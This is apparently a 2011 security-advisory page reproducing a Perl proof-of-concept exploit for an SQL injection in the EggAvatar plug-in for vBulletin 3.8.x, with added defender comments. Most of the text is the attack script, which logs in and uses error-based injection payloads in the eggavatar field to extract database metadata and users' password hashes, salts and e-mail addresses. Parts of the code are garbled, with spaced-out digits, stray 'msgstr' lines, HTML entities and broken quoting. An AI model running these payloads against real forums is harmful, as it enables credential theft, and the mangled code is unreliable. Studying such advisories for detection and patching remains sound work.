EggAvatar for vBulletin 3.8.x SQL injection vulnerability - vulnerability warning - the black bar safety net

2011-03-09T00:00:00
ID MYHACK58:62201129662
Type myhack58
Reporter 佚名
Modified 2011-03-09T00:00:00

Description

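vBulletin is a well-known commercial forum application. The EggAvatar plug-in for vBulletin 3.8.x contains an SQL injection vulnerability that could lead to disclosure of sensitive information. In the PoC below, the injection point is the `eggavatar` form field of a POST to eggavatar.php (do=addegg), sent after logging in with a forum account, and the data read back are server metadata and rows of the forum's user table, including the password, salt and e-mail columns. The PoC header names plug-in version 2.3.2, tested on vBulletin 3.8.0.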

[+]info: ~~~~~~~~~ EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability

[+]poc: ~~~~~~~~~


| 0 1 | #!/ usr/bin/env perl ---|---

0 2 | use LWP::UserAgent; ---|---

# banner(): prints the PoC author's banner (group name and contact address) to STDOUT.
# It takes no arguments and sends no requests.
0 3 | sub banner{ ---|---

0 4 | print "###################################\n"; ` ---|---

0 5 | print "############ DSecurity############\n"; ` ---|---

0 6 | print "###################################\n"; ` ---|---

0 7 | print "# Email:dsecurity. vn[at]gmail.com #\n"; ` ---|---

0 8 | print "###################################\n"; ` ---|---

0 9 | } ---|---

# Usage gate: prints the usage text and exits when fewer than five arguments are given.
# Per the usage line, the arguments are base URL, forum username, password, number of user rows, and delay.
1 0 | if(@ARGV<5){ ` ---|---

1 1 | print"Usage: $0 address username password number_user sleeptime\n"; ---|---

1 2 | print"Example: $0 <http://localhost/vbb> test test 1 0 1 0\n"; ---|---

1 3 | exit(); ---|---

1 4 | } ---|---

# Shared HTTP client used by login() and v_request().
# Defender's note: every request sent through $ua carries the fixed User-Agent string "DSecurity",
# which makes unmodified runs of this listing easy to find in web-server access logs.
1 5 | $ua=LWP::UserAgent->new(); ` ---|---

1 6 | $ua->agent("DSecurity"); ` ---|---

# The cookie jar keeps cookies set by the login response for the requests that follow.
1 7 | $ua->cookie_jar({}); ` ---|---

# login(username, password): POSTs the supplied forum credentials to login.php (do=login)
# through the shared $ua, so the session cookie lands in its cookie jar.
# Presumably this is needed because the eggavatar.php request is only handled for a
# logged-in member - the plug-in source is not shown on this page, so confirm against it.
# NOTE(review): $res is assigned but not inspected in the lines shown.
1 8 | sub login(@){ ---|---

1 9 | my$username=shift; ---|---

2 0 | my$password=shift; ---|---

2 1 | my$req= HTTP::Request->new(POST => $ARGV[0].'/ login. php? do=login"); ` ---|---

2 2 | $req-&gt;content_type('application/x-www-form-urlencoded"); ---|---

2 3 | $req-&gt;content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1 2 9 9 3 4 2 4 7 3-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf="); ---|---

2 4 | my$res= $ua->request($req); ` ---|---

2 5 | } ---|---

# v_request(label, select, from, where, limit): sends one POST to eggavatar.php (do=addegg)
# whose `eggavatar` form field carries a quote followed by a SQL sub-select built from the
# arguments, then returns the label followed by the value pulled out of the response.
#
# Defender's notes, all read off this listing:
#   - The value is recovered from the text following "MySQL Error" in the HTTP response (see the
#     regex near the end), so the leak relies on the forum returning database error text to the client.
#   - Log markers: POST to /eggavatar.php with do=addegg, SQL keywords inside the eggavatar field,
#     and the "DSecurity" User-Agent set on the shared client.
#   - NOTE(review): the plug-in evidently places the eggavatar field into a query without escaping;
#     the plug-in source is not on this page, so confirm the exact sink there before patching.
2 6 | sub v_request{ ---|---

2 7 | msgstr "" #Declare ` ---|---

2 8 | $print= $_[0]; ` ---|---

2 9 | $select= $_[1]; ` ---|---

3 0 | $from= $_[2]; ` ---|---

3 1 | $where= $_[3]; ` ---|---

3 2 | $limit= $_[4]; ` ---|---

# The delay between requests is taken from the fifth command-line argument, not from a parameter.
3 3 | $sleep= $ARGV[4]; ` ---|---

# Defaults applied when an argument is empty (table, condition, row offset, delay).
3 4 | if($from eq") {$from= 'information_schema. tables";} ` ---|---

3 5 | if($where a eq") {$where= '1";} ` ---|---

3 6 | if($limit eq") {$limit= '0";} ` ---|---

3 7 | if($sleep eq") {$sleep= '1 0";} ` ---|---

3 8 | ---|---

3 9 | msgstr "" # Create a request ` ---|---

4 0 | my$req= HTTP::Request->new(POST => $ARGV[0].'/ eggavatar.php"); ` ---|---

4 1 | $req-&gt;content_type('application/x-www-form-urlencoded"); ---|---

# Request body: the eggavatar field is the injection point; securitytoken, uid and pid are fixed values.
4 2 | $req-&gt;content('do=addegg&securitytoken=1 2 9 9 3 4 2 4 7 3-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1"."' and (SELECT 1 FROM(SELECT COUNT(),CONCAT((select $select from $from WHERE $where limit $limit,1),FLOOR(RAND(1)3))foo FROM information_schema. tables GROUP BY foo)a)-- -'&uid=1&pid=1"); ---|---

4 3 | msgstr "" # Pass request to the user agent and get a response back ` ---|---

4 4 | my$res= $ua->request($req); ` ---|---

4 5 | #print $res->content; ` ---|---

# The third capture group of the error-text match is kept as the extracted value.
4 6 | if($res-&gt;content =~ /(MySQL Error)(.*?)' (.*?) 0"(.*)/) ---|---

4 7 | {$test =$3}; ---|---

# Pause between requests.
4 8 | sleep($sleep); ---|---

4 9 | return$print.$ test."\ n"; ---|---

5 0 | } ---|---

# Main flow: print the banner and advisory header, log in with the supplied account,
# then call v_request() once per value to read.
5 1 | &banner; ---|---

5 2 | print "\n############################################################################################################# \n"; ` ---|---

5 3 | print "# EggAvatar for vBulletin 3.8. x SQL Injection Vulnerability #\n"; ` ---|---

5 4 | print "# Date:06-03-2011 #\n"; ` ---|---

5 5 | print "# Author: DSecurity #\n"; ` ---|---

5 6 | print "# Software Link: &lt;http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html&gt; #\n"; ` ---|---

5 7 | print "# Version: 2.3.2 #\n"; ` ---|---

5 8 | print "# Tested on: vBulletin 3.8.0 #\n"; ` ---|---

5 9 | print "#############################################################################################################\ n"; ` ---|---

6 0 | ---|---

6 1 | #login ---|---

6 2 | login($ARGV[1],$ARGV[2]); ---|---

# The four calls below read database server metadata: version, data directory, DB user and database name.
6 3 | #Foot print ---|---

6 4 | print v_request('MySQL version: ",'@@version"); ---|---

6 5 | print v_request('Data dir: ",'@@datadir"); ---|---

6 6 | print v_request('User: ",'user()"); ---|---

6 7 | print v_request('Database: ",'database()"); ---|---

# The loop runs once per requested user row and reads userid, usergroupid, username, password,
# salt and email from the `user` table.
# Impact for defenders: a site that ran the affected plug-in should treat those columns as exposed
# and plan credential resets accordingly.
6 8 | #Get user ---|---

6 9 | for($i=1;$i<=$ARGV[3];$i++){ ` ---|---

7 0 | print"-----------------------------------------\n"; ---|---

7 1 | print$id= v_request('ID: ",'userid",'user",'1",$i-1); ` ---|---

7 2 | if($id=~ /(ID:)\s(.*)/) { ` ---|---

7 3 | printv_request('Group: ",'usergroupid",'user",'userid=".$ 2); ` ---|---

7 4 | printv_request('Username: ",'username",'user",'userid=".$ 2); ` ---|---

7 5 | printv_request('Password: ",'password",'user",'userid=".$ 2); ` ---|---

7 6 | printv_request (the'Salt: ",'salt",'user",'userid=".$ 2); ` ---|---

7 7 | printv_request('Email: ",'email",'user",'userid=".$ 2); ` ---|---

7 8 | } ` ---|---

7 9 | ---|---

8 0 | } ---|---

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16934